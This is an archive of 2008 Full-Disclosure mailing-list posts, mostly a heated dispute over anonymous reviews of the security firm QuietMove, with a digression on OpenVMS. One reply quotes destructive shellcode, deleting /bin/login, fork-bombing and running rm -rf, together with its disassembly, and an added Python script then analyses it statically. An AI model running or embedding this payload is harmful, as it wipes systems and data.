Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-02 Thread Andre Gironda
On Jan 1, 2008 9:51 PM, reepex <[EMAIL PROTECTED]> wrote:
> ok so they are nothing alike because ptp/hts actually teach you stuff while
> "UPT" was for jokes... so your post was stupid

The joke's on you since you don't have the context.

> I am not a part of secreview but I realize following email threads is very
> complicated for you.

It's not complicated.  I simply just don't care about who you are as
it relates to the thread.  You appear to be attacking the
person/people I'm defending, while at the same time defending the
secreview post.

> So you list 5 tools they use then mention they modify a javascript
> library...  So basically they use automated tools and  are former  web
> developers ... sound pretty hardcore

Javascript is more than just a language for web developers, especially
when utilized in the Hailstorm SmartAttack library, which isn't a
Javascript library.  These are completely different concepts.  It
should also be noted that both Burp Suite and Hailstorm ARC can be
used in manual and hybrid modes... with step-modes and form-trainers.
They can modify their traversals and have tons of extra customization
on top of what other offerings provide... and can customize the
underlying "data-driven" attacks.

Certainly you've read some of Adam Muntner's comments on, say,
ha.ckers.org and other places?

Allow me to pick on someone in the industry for a second: RSnake.

RSnake has an advertisement up on his website that asks, "Which web
application scanner can hack it?" "Check the Oct 15 post for study
results:"
http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/

Most idiots will only read what RSnake / Larry Suto have written, and
will completely miss the comments by Adam Muntner.  Adam not only
eloquently puts down the testing techniques by Larry Suto, but also
makes mention about proper customization of tools and testing outside
of the commercial scanners.

Effectively, Adam Muntner is one of the only people that does
understand this problem that you specifically say that he does not,
and that the secreview challenge seems to care about most of all other
points.

Where was reepex, where was secreview when RSnake and Larry Suto
blundered our industry into submission?  Why pick on a hero like Adam
Muntner instead?  What are you getting out of it?

Worse - RSnake hasn't been called out on this yet - but he has good
reason to promote Larry's paper.  In fact, it may even be a monetary
reason.  In an article for INSECURE Magazine, they interview RSnake
(page 30):
http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf

Question: What web application scanners do you use?

RSnake: [...] my favorite tools in my arsenal (including the manual
ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap,
NTOSpider (commercial), httprint, Cain, sn00per, Absynthe, Sqlninja, a
half dozen Firefox plugins like Webdeveloper, JSView, NoScript,
Greasemonkey etc... and the entire suite of unix utils out there, like
wget, telnet, ncftp, etc.

Notice the only commercial tool listed is NTOSpider.  Coincidence?

Apparently, too much admiration of a single web application security
scanning vendor can be a bad thing.  Larry Suto has only ever worked
with Eric Caso at NTObjectives.

Adam Muntner has been a customer of several CWE-Compatible and
aspiring companies out there.  He has a balanced view of both the
commercial tools and the open-source world, as well as building his
own tools from scratch as the need may be.

> You must be a cissp because you take yourself and the internet very
> seriously. I am pretty sure no one cares about your opinion either.

Wrong again; as always.

Cheers,
Andre

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( F + )

2008-01-02 Thread Andre Gironda
On Jan 2, 2008 12:17 AM, secreview <[EMAIL PROTECTED]> wrote:
> Regardless, Adam did react to our website comments, and his reaction was as
> follows, verbatim:

Secreview is clearly anything less than professional. I would say this
is a repeat of "InfoSecSellout" if not the exact same people.

> In a Different email Andre lost all credibility with us because he decided
> to directly attack other companies that we've reviewed that received higher
> grades. If you compare the score cards between QuietMove and the other
> company that Andre bashes, you'll see why they got the good grade. Anyway,
> here's what Andre had to say (we'll comment later):

If I know something bad about a company that you gave a good grade to,
I feel the need to bash that company based on your reputation alone.

In other words, since you can't be trusted; I feel the need to offset
any good things you've said by adding my own commentary.

Every security consulting company is unique (have their own unique
good/bad points).  Many are small and as I said before, "fighting just
to stay in business".  If you are going to give poor reviews, I
suggest you write them up and keep them to yourself instead of
publishing them.

For one of the companies that I worked for in the past, we had a
special way of analyzing new products/services.  In our assessments,
we would gather up all of the good points of the best vendors --
instead of focusing on the bad points of vendors that failed our
criteria.

It takes a special kind of asshole to do what you do.  I also believe
that you know this, and only by hiding behind anonymity are you
willing to continue to do what it is that you do.

As far as losing credibility with you, I'm clearly fine with that...
I'll be getting plenty of free beer from others who dislike you.
Maybe your nepotism will pay off with the companies you give good
grades to.  Maybe you'll win a Nobel Prize for your amazing
methodology of rating security consulting companies by their websites,
as well as the scientific method (i.e. using Google to search
mailing-lists for people's names).

Cheers,
Andre



Re: [Full-disclosure] here

2008-01-02 Thread Nikolay Kichukov
Thanks Andrew! Nice catch! ;-)

Cheers,
- -Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
> 
>> char sc[] =
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>>  "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>>  "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>>  "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>>  "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>>  "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>>  "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>>  "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>>  "\x04\x0B\xCD\x80";
> 
> 
> Abbreviated disassembly:
>     signal(SIGHUP, SIG_IGN)
>     something that looks like a 15-level deep fork() bomb
>     something involving kill()
>     unlink("/bin/login")
>     execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
> 
> You could at least try to obfuscate your constants a little better.  
> That was way too easy.
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
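
The static check behind the "abbreviated disassembly" in the message above, written out as an added example that is not part of the original thread: a small linear decoder that recovers the stack strings and syscall numbers from the tail of the posted sc[] array without executing it. The function names (triage, red_flags) and the handful of opcodes modelled are assumptions chosen for this fragment; it is not a general x86 disassembler.

```python
"""Static triage of a 32-bit Linux x86 shellcode fragment. Nothing is executed."""

# Tail of the sc[] array quoted in the post above (bytes copied from the page).
SC_TAIL = bytes.fromhex(
    "31c050" "686f67696e" "68696e2f6c" "682f2f2f62" "89e3" "31c0040acd80"
    "31c050" "682a2f2f2f" "89e2" "50" "682d726666" "89e1"
    "50" "686e2f726d" "682f2f6269" "89e3" "5052515389e1" "31d2040bcd80"
)

# Linux i386 syscall numbers relevant to the disassembly in the post.
I386_SYSCALLS = {1: "exit", 2: "fork", 10: "unlink", 11: "execve",
                 37: "kill", 48: "signal", 64: "getppid", 66: "setsid"}


def triage(code: bytes) -> dict:
    """Linear sweep over a small opcode subset.

    Returns the strings built with consecutive `push imm32` instructions,
    the syscalls reached through `int 0x80`, and offsets of bytes the
    decoder did not understand (so the analyst knows where it is blind).
    """
    strings, syscalls, unknown = [], [], []
    run = []      # immediates of consecutive `push imm32` instructions
    al = None     # tracked value of AL; None means "not known statically"
    i, n = 0, len(code)

    def flush():
        if run:
            # The stack grows down: the last dword pushed is the string's start.
            strings.append(b"".join(reversed(run)).decode("ascii", "replace"))
            run.clear()

    while i < n:
        op = code[i]
        if op == 0x68 and i + 5 <= n:               # push imm32
            run.append(code[i + 1:i + 5])
            i += 5
            continue
        flush()                                     # any other opcode ends a run
        two = i + 2 <= n
        if 0x50 <= op <= 0x57:                      # push r32 (often the NUL)
            i += 1
        elif op in (0x31, 0x89) and two and code[i + 1] >> 6 == 3:
            modrm = code[i + 1]                     # xor/mov r32, r32
            if modrm & 7 == 0:                      # destination is eax
                zeroed = op == 0x31 and (modrm >> 3) & 7 == 0
                al = 0 if zeroed else None          # xor eax,eax -> 0
            i += 2
        elif op == 0xB0 and two:                    # mov al, imm8
            al = code[i + 1]
            i += 2
        elif op == 0x04 and two:                    # add al, imm8
            al = None if al is None else (al + code[i + 1]) & 0xFF
            i += 2
        elif op == 0xCD and two:                    # int imm8
            if code[i + 1] == 0x80:
                syscalls.append((i, al, I386_SYSCALLS.get(al, "unknown")))
                al = None                           # return value overwrites eax
            i += 2
        else:
            unknown.append(i)                       # not modelled: skip one byte
            i += 1
    flush()
    return {"strings": strings, "syscalls": syscalls, "unknown": unknown}


def red_flags(report: dict) -> list:
    """Heuristic reasons not to run the payload, derived from triage()."""
    names = {name for _, _, name in report["syscalls"]}
    flags = []
    if "unlink" in names:
        flags.append("removes a file via unlink")
    if "execve" in names and any(
            s.strip("/").endswith("bin/rm") for s in report["strings"]):
        flags.append("executes rm")
    return flags


if __name__ == "__main__":
    report = triage(SC_TAIL)
    for text in report["strings"]:
        print("stack string:", text)
    for offset, number, name in report["syscalls"]:
        print(f"int 0x80 at +{offset}: eax={number} ({name})")
    print("flags:", red_flags(report))
```

The AL tracking is a heuristic: it assumes straight-line code, so anything reported under "unknown" or reached by a jump needs a real disassembler.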


[Full-disclosure] Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Adam Muntner
Andre is a friend but not an employee or representative of the
business- HOWEVER - There were a number of inaccuracies in his
statements about me. A selection of corrections to statements are below.


- I never ran UPT
- all the speculation about our methodology and pricing was wrong.
- the quantity of automated vs hands on testing we perform is based on
what the customer is willing to pay for. Novel concept. We explain
carefully what can and can't be found. The customer selects their
appropriate level of risk acceptance based on the value of the target of
evaluation and their budget. We always try to go above and beyond.
- our overhead is low-no giant headquarters - we are virtual mostly  
except for a rack cage. We don't have to support a giant marketing  
team and don't do $20k trade show booths. As a result that isn't built  
into our pricing.
- I was never a 'uNIX admin' but did engineer one of the early
commercially avail Beowulf clusters - in 1998 - and have run some unix
boxes, meaning it took all of 3 hours a month of my time, but I was
not a 'unix admin' by any stretch of the imagination. The opennsd
posts were from what, 10 years ago?

More evidence of your poor arithmetic skills from the initial post.
- the website wasn't updated because I am taking a vacation to NYC and  
would rather enjoy myself than meet some 12 hour unmentioned timetable  
to edit the website by an anonymous coward pfy.
- they weren't insults, they were sarcastic though accurate
representations of your subpar (at best) review capabilities
- others but really, who cares? You are not interested in facts as I  
will prove below.


Your analysis is worthless. Several weeks ago you posted your alleged
methodology. It included contacting the vendor PRIOR to review, which
you didn't do. You also didn't notify us of the review. I read it on fd
myself.


You sent a list of questions on new years day, after you posted the  
review, and half a day later posted your re review without again  
contacting me directly except with a monster list of questions - not  
so much as a phone call. Your alleged review was based on list noise,
not speaking with me.


You still have yet to post your scoring methodology as promised. You  
fail.


Frankly I find the drama and anonymous weenie-waving on this list to  
be tedious. FD is more a running joke than a productive mailing list.  
Save the drama fo yo mama.


On my timetable I'll respond to your questions to the list, not to
you directly. Frankly I don't trust you to represent them accurately.
Right now I'm going to visit the metropolitan museum of art, and
tonight go party - not answer your essay test. Sorry to disappoint.


As a number of list members commented privately to me - you don't  
deserve the attention.


That said, if you can prove you will follow your own previously stated  
methodology, I'll re review your review system. Following your  
methodology I will post a f--- score in 6-12 hours or maybe  
sooner if you don't respond.


That's a joke, son. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sorry for typos - sent from my 31337 jailbroken iPhone. It runs unix.  
I guess that makes me a unix admin!


On Jan 2, 2008, at 2:17 AM, secreview <[EMAIL PROTECTED]> wrote:


Our first QuietMove review can be found here.

QuietMove, located at http://www.quietmove.com is a Professional IT
Security Services company that was founded by Adam Muntner, Jeffrey
Rassas and James G. (Jim) Garvey, Jr. We’ve already performed one
review of QuietMove but Adam Munter and his team didn’t like the
review. As a result, we’ve gone back and revisited our data and are
producing this second, hopefully more accurate review.


Our first point of criticism is still the QuietMove web-site. Their  
services are poorly defined, and even somewhat contradictory. For  
example, under their Penetration Testing section they nearly bash  
the use of Automated tools. Shortly thereafter they go on to say  
that they offer services for nearly the same cost as “cookie-cutter”
services.


Well, we still have a problem with that.  The overhead cost of using  
quality talent is always going to be far greater than the fees  
charged by vendors that sell automated scanning software. Any time  
someone tells us that they can offer “expert driven” services at
the same price points or even nearly the same as a “cookie
cutter” service, we say bullshit.


Taking it a step further, we still stick by our previous opinion
that the QuietMove website doesn’t have much to offer prospective
customers in the way of useful information. The services shown are
very poorly defined; the grammar is still horrible, and frankly the
website is incomplete. Want to see what we mean, click on their “Social
Engineering” tab under their service offerings; you’ll notice
that there is no description. We hope that their website does not
reflect the quality

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Adam Muntner
Just to be clear the corrections to secreview reepex and Andre were  
intermingled.


The ones I mentioned were the ones secreview and reepex, the anonymous  
cowards too embarrassed by their own ignorant commentary to stand  
behind them, called out.


Dre thx for pointing out the ha.ckers.org posts. More evidence of  
secreview selective quotation and/or ability to 'research'


He can't even spell the name of the company he reviews correctly.

Secreview re-re-score-  
f---.


:)

Ho hum!

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 9:32 AM, Adam Muntner <[EMAIL PROTECTED]>  
wrote:


Andre is a friend but not an employee or representative of the
business- HOWEVER - There were a number of inaccuracies in his
statements about me. A selection of corrections to statements are
below.


- I never ran UPT
- all the speculation about our methodology and pricing was wrong.
- the quantity of automated vs hands on testing we perform is based
on what the customer is willing to pay for. Novel concept. We
explain carefully what can and can't be found. The customer selects
their appropriate level of risk acceptance based on the value of the
target of evaluation and their budget. We always try to go above and
beyond.
- our overhead is low-no giant headquarters - we are virtual mostly  
except for a rack cage. We don't have to support a giant marketing  
team and don't do $20k trade show booths. As a result that isn't  
built into our pricing.
- I was never a 'uNIX admin' but did engineer one of the early
commercially avail Beowulf clusters - in 1998 - and have run some
unix boxes, meaning it took all of 3 hours a month of my time, but I
was not a 'unix admin' by any stretch of the imagination. The
opennsd posts were from what, 10 years ago?

More evidence of your poor arithmetic skills from the initial post.
- the website wasn't updated because I am taking a vacation to NYC  
and would rather enjoy myself than meet some 12 hour unmentioned  
timetable to edit the website by an anonymous coward pfy.
- they weren't insults, they were sarcastic though accurate
representations of your subpar (at best) review capabilities
- others but really, who cares? You are not interested in facts as I  
will prove below.


Your analysis is worthless. Several weeks ago you posted your
alleged methodology. It included contacting the vendor PRIOR to
review, which you didn't do. You also didn't notify us of the review.
I read it on fd myself.


You sent a list of questions on new years day, after you posted the  
review, and half a day later posted your re review without again  
contacting me directly except with a monster list of questions - not  
so much as a phone call. Your alleged review was based on list noise,
not speaking with me.


You still have yet to post your scoring methodology as promised. You  
fail.


Frankly I find the drama and anonymous weenie-waving on this list to  
be tedious. FD is more a running joke than a productive mailing  
list. Save the drama fo yo mama.


On my timetable I'll respond to your questions to the list, not
to you directly. Frankly I don't trust you to represent them
accurately. Right now I'm going to visit the metropolitan museum of
art, and tonight go party - not answer your essay test. Sorry to
disappoint.


As a number of list members commented privately to me - you don't  
deserve the attention.


That said, if you can prove you will follow your own previously  
stated methodology, I'll re review your review system. Following  
your methodology I will post a f--- score in 6-12 hours or  
maybe sooner if you don't respond.


That's a joke, son. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sorry for typos - sent from my 31337 jailbroken iPhone. It runs  
unix. I guess that makes me a unix admin!


On Jan 2, 2008, at 2:17 AM, secreview <[EMAIL PROTECTED]> wrote:


Our first QuietMove review can be found here.

QuietMove, located at http://www.quietmove.com is a Professional IT  
Security Services company that was founded by Adam Muntner, Jeffrey  
Rassas and James G. (Jim) Garvey, Jr. We’ve already performed one
review of QuietMove but Adam Munter and his team didn’t like the
review. As a result, we’ve gone back and revisited our data and are
producing this second, hopefully more accurate review.


Our first point of criticism is still the QuietMove web-site. Their  
services are poorly defined, and even somewhat contradictory. For  
example, under their Penetration Testing section they nearly bash  
the use of Automated tools. Shortly thereafter they go on to say  
that they offer services for nearly the same cost as “cookie-cutter”
services.


Well, we still have a problem with that. The overhead cost of using  
quality talent is always going to be far greater than the fees  
charge

[Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Peter Dawson
Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link
you could share ?
tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner < [EMAIL PROTECTED]> wrote:

>
>
> Dre thx for pointing out the ha.ckers.org posts. More evidence of
> secreview selective quotation and/or ability to 'research'
>
>

Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Adam Muntner
It was a reply to the larry suto review of web app scanners rsnake  
posted. I commented on his blog post. The review was totally worthless.


Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <[EMAIL PROTECTED]> wrote:



Adam

I don't recall Rsnake or id posting a review on secreview. Is there  
a link you could share ?

tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner < [EMAIL PROTECTED]>  
wrote:



Dre thx for pointing out the ha.ckers.org posts. More evidence of  
secreview selective quotation and/or ability to 'research'





Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Mukul Dharwadkar
With all due respect Adam,

You would not have responded to these posts at all if you thought these
reviews were worthless.


On 1/2/08, Adam Muntner <[EMAIL PROTECTED]> wrote:
>
>  It was a reply to the larry suto review of web app scanners rsnake
> posted. I commented on his blog post. The review was totally worthless.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> Phone: 602-793-5969
> Fax: 866-272-8194
> http://www.quietmove.com
>
>
> Sent from my iPhone
>
> On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <[EMAIL PROTECTED]> wrote:
>
>
>
>
> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there a link
> you could share ?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner < [EMAIL PROTECTED]> wrote:
>
> >
> >
> >
> > Dre thx for pointing out the ha.ckers.org posts. More evidence of
> > secreview selective quotation and/or ability to 'research'
> >
> >
> >
>
>
>
>
>



-- 
Smile!!! :) It improves your face value...

Visit me at
http://www.dharwadkar.com
http://www.dharwadkar.org
Sister Site:
http://www.saraswatibhuvan.org

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

2008-01-02 Thread SecReview
Hi Adam, 
   
We've said this before and will say this again, this time to 
everyone. 

We would be more than happy to give your company (QuietMove) a 
"better" review if you'd enable us to do that. So far you haven't 
helped us to effectively review you at all. We tried to call you 
before our initial review, but never got hold of anyone. We also 
sent you an email before writing our second review, and you never 
responded to any of the questions in that email. If you'd like us 
to do a better review then provide us with the information that you 
think we will need to get the job done. 

Our current review is the product of your website, emails that 
you've posted to this and other forums, and your reaction to our 
first review. We haven't been able to find anything related to 
major accomplishments by you or by QuietMove, we haven't seen any 
sample reports, and we haven't received any answers to any 
questions about your methodologies for service execution and 
delivery. We even think that our current review might be too harsh, 
but can't change anything without more information. 

If you want us to change our review, we can do that again and we 
can do it in a non-biased way (regardless of all the rants and 
noise). We need you to tell us about your service delivery 
methodologies, your reporting methodologies, how you define 
specific service offerings, what markets you play in, and if 
possible sanitized sample reports. We won't publish any of that 
information directly, but we would use that to produce your next 
review. 

We want our reviews to accurately and truthfully reflect the 
quality and professionalism of the providers that we study. (In 
fact, if anyone has any suggestions as to how we could better 
"rank" security companies we'd be more than happy to listen and 
consider those suggestions.) 

Hope this helps. This will be our last email about QuietMove unless 
you request a redo of the current review. We will only redo the 
review if you are able to provide us with accurate information to 
help us get it done. We think that you should do it, because we 
think that you can score much better than an F+. (You're clearly 
not an idiot and you do have at least some experience.)

-the end.




Regards, 
  The Secreview Team
  http://secreview.blogspot.com

  Professional IT Security Service Providers - Exposed



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-02 Thread Valdis . Kletnieks
On Tue, 01 Jan 2008 12:33:36 CST, reepex said:

> Is this list up to date?  It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C?

C is not a prerequisite for understanding operating systems design. It's only
needed if the particular operating system you're working with implements its
internals in C.

What is more important is understanding the *concepts* - things like locking,
and race conditions, and how fine-grained locking you need/want for a
filesystem. Having one big lock is a lot easier, but causes contention - having
a lot of little locks can cause deadlocks, especially in error handlers.  What
does the filesystem code do if (for example) it gets 2/3 of the way through the
rename of a file, and encounters an I/O error while writing out the removal of
the old name of the file?  What are the trade-offs required for an operating
system to support jitter-free multimedia applications (the first thing to learn
is that throughput, latency, and jitter are intertwined, and it's very
difficult to do all 3 well at the same time)?

It's also important to understand that there are approaches other than Windows
and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and
have a lot to tell us about other choices that can be made.  There's still a
lot of VMS running out there in scattered corners as well - and that system had
a lot of concepts that one should understand, at least well enough to know why
"my favorite system didn't do it that way because..." (Hint - consider how and
why SYS$FOO variables worked in VMS, and why they're so hard to get working
correctly under Linux - they're *not* exactly the same as Unix/Linux
environment variables, and as such provide both problems and solutions that
environment variables don't).

Bonus points for knowing that VMS was mostly written in Bliss/32 or some such,
and VM and MVS were a mixture of assembler and (later on) PL/S.  No C knowledge
needed for those critters...

Even when the system *is* written in C, you don't need to be a C guru to
understand what's going on. Maurice Bach's "The Design of the Unix Operating
System" is probably one of the classic texts - but you don't need to know C any
better than "read C code snippet as pseudocode" to follow it.



[Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread Randal T. Rioux
>[EMAIL PROTECTED] said:

>Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
>such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
>No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original 
source (wasn't it written on stone tablets?). About 50% is C, with a healthy 
mix of obsoletes making the difference. How something so elegant could be 
spawned from such chaos is beyond me.

Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE! 

Randy



Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)

2008-01-02 Thread William Lefkovics
Anonymous reviews by people who have not used the services of the company
they are reviewing aren't worth the virtual paper they are written on. (even
the name on the site indicates the goal of companies 'exposed' not
'reviewed'.) I am no security expert and would depend on using an external
company for certain security services.  All I have gained from this
discussion is to completely ignore secreview content in making any
determination of companies to call upon for things like penetration testing.

 

I don't know you from... well... Adam.  Your concern is probably that actual
potential clients may read such content and not realize it is drivel. How
about a blog post or something commenting that 'don't be fooled by company
reviews by people who have never tried our services.'? Just curious.

 

 

 

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Adam Muntner
Sent: Wednesday, January 02, 2008 7:26 AM
To: Peter Dawson
Cc: Full-Disclosure dis
Subject: Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F
---)

 

It was a reply to the larry suto review of web app scanners rsnake posted. I
commented on his blog post. The review was totally worthless.

Adam Muntner

Managing Partner

QuietMove, Inc.

Phone: 602-793-5969

Fax: 866-272-8194

http://www.quietmove.com

 

Sent from my iPhone


On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <[EMAIL PROTECTED]> wrote:

 

Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link
you could share ?
tia

/pd

 

On Jan 2, 2008 9:45 AM, Adam Muntner <  
[EMAIL PROTECTED]> wrote:

 

 

Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview
selective quotation and/or ability to 'research'

 

 


Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-02 Thread reepex
everyone who is not a kiddie knows rsnake is a joke, just like anyone else
involved in his *.ackers group.   If rsnake was to post to places like this
instead of lamer 'hacker'/'security' magazines then he would be ridiculed
off the list like pdp architect was.  Instead I believe rsnake knows he's a
kiddie so he sticks to places with non-technical people and does not involve
himself with people who actually know what they are talking about.

I picked on  Adam Munter mostly because his lame intern decided to spout up
on the list only to end up being a kiddie, and also Adam brought it upon
himself by putting any worth into what secreview says and replying to their
review.


On Jan 2, 2008 12:02 AM, Andre Gironda <[EMAIL PROTECTED]> wrote:

> On Jan 1, 2008 9:51 PM, reepex <[EMAIL PROTECTED]> wrote:
> > ok so they are nothing alike because ptp/hts actually teach you stuff
> while
> > "UPT" was for jokes... so your post was stupid
>
> The joke's on you since you don't have the context.
>
> > I am not a part of secreview but I realize following email threads is
> very
> > complicated for you.
>
> It's not complicated.  I simply just don't care about who you are as
> it relates to the thread.  You appear to be attacking the
> person/people I'm defending, while at the same time defending the
> secreview post.
>
> > So you list 5 tools they use then mention they modify a javascript
> > library...  So basically they use automated tools and  are former  web
> > developers ... sound pretty hardcore
>
> Javascript is more than just a language for web developers, especially
> when utilized in the Hailstorm SmartAttack library, which isn't a
> Javascript library.  These are completely different concepts.  It
> should also be noted that both Burp Suite and Hailstorm ARC can be
> used in manual and hybrid modes... with step-modes and form-trainers.
> They can modify their traversals and have tons of extra customization
> on top of what other offerings provide... and can customize the
> underlying "data-driven" attacks.
>
> Certainly you've read some of Adam Muntner's comments on, say,
> ha.ckers.org and other places?
>
> Allow me to pick on someone in the industry for a second: RSnake.
>
> RSnake has an advertisement up on his website that asks, "Which web
> application scanner can hack it?" "Check the Oct 15 post for study
> results:"
>
> http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/
>
> Most idiots will only read what RSnake / Larry Suto have written, and
> will completely miss the comments by Adam Muntner.  Adam not only
> eloquently puts down the testing techniques by Larry Suto, but also
> makes mention about proper customization of tools and testing outside
> of the commercial scanners.
>
> Effectively, Adam Muntner is one of the only people that does
> understand this problem that you specifically say that he does not,
> and that the secreview challenge seems to care about most of all other
> points.
>
> Where was reepex, where was secreview when RSnake and Larry Suto
> blundered our industry into submission?  Why pick on a hero like Adam
> Muntner instead?  What are you getting out of it?
>
> Worse - RSnake hasn't been called out on this yet - but he has good
> reason to promote Larry's paper.  In fact, it may even be a monetary
> reason.  In an article for INSECURE Magazine, they interview RSnake
> (page 30):
> http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf
>
> Question; What web application scanners do you use?
>
> RSnake: [...] my favorite tools in my arsenal (including the manual
> ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap,
> NTOSpider (commercial), httprint, Cain, sn00per, Absynthe, Sqlninja, a
> half dozen Firefox plugins like Webdeveloper, JSView, NoScript,
> Greasemonkey etc... and the entire suite of unix utils out there, like
> wget, telnet, ncftp, etc.
>
> Notice the only commercial tool listed is NTOSpider.  Coincidence?
>
> Apparently, too much admiration of a single web application security
> scanning vendor can be a bad thing.  Larry Suto has only ever worked
> with Eric Caso at NTObjectives.
>
> Adam Muntner has been a customer of several CWE-Compatible and
> aspiring companies out there.  He has a balanced view of both the
> commercial tools and the open-source world, as well as building his
> own tools from scratch as the need may be.
>
> > You must be a cissp because you take yourself and the internet very
> > seriously. I am pretty sure no one cares about your opinion either.
>
> Wrong again; as always.
>
> Cheers,
> Andre
>

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread Valdis . Kletnieks
On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:

> OpenVMS is less than 40% Blissful...

Obviously, it's migrated over the years.  Back in the late 80's when it
was at its most prevalent (and before it got 'Open' attached to it - we're
talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
Bliss32..

> Security relevance: UNHACKABLE! 

WANK! (The old-timers will know what that means, and it's not what you newbies
think... ;)



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )

2008-01-02 Thread reepex
if you noticed he was reading Tanenbaum's book about minix. If you would look
at the book you would see he relies heavily on source code and actually has
the code in the back of the book so that he can refer to it constantly. In
other books I agree you do not have to know C, but for this book, if you do
not know C, you will end up understanding at a very very high level what
message passing is and that's about it.

On Jan 2, 2008 12:39 PM, <[EMAIL PROTECTED]> wrote:

> On Tue, 01 Jan 2008 12:33:36 CST, reepex said:
>
> > Is this list up to date?  It makes it seem as if you are learning basic
> > linux commands, sed, and basic perl. Also why are you reading operating
> > system design and implementation when you do not know C?
>
> C is not a prerequisite for understanding operating systems design. It's only
> needed if the particular operating system you're working with implements its
> internals in C.
>
> What is more important is understanding the *concepts* - things like locking,
> and race conditions, and how fine-grained locking you need/want for a
> filesystem. Having one big lock is a lot easier, but causes contention - having
> a lot of little locks can cause deadlocks, especially in error handlers.  What
> does the filesystem code do if (for example) it gets 2/3 of the way through the
> rename of a file, and encounters an I/O error while writing out the removal of
> the old name of the file?  What are the trade-offs required for an operating
> system to support jitter-free multimedia applications (the first thing to learn
> is that throughput, latency, and jitter are intertwined, and it's very
> difficult to do all 3 well at the same time)?
>
> It's also important to understand that there are approaches other than Windows
> and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and
> have a lot to tell us about other choices that can be made.  There's still a
> lot of VMS running out there in scattered corners as well - and that system had
> a lot of concepts that one should understand, at least well enough to know why
> "my favorite system didn't do it that way because..." (Hint - consider how and
> why SYS$FOO variables worked in VMS, and why they're so hard to get working
> correctly under Linux - they're *not* exactly the same as Unix/Linux
> environment variables, and as such provide both problems and solutions that
> environment variables don't).
>
> Bonus points for knowing that VMS was mostly written in Bliss/32 or some such,
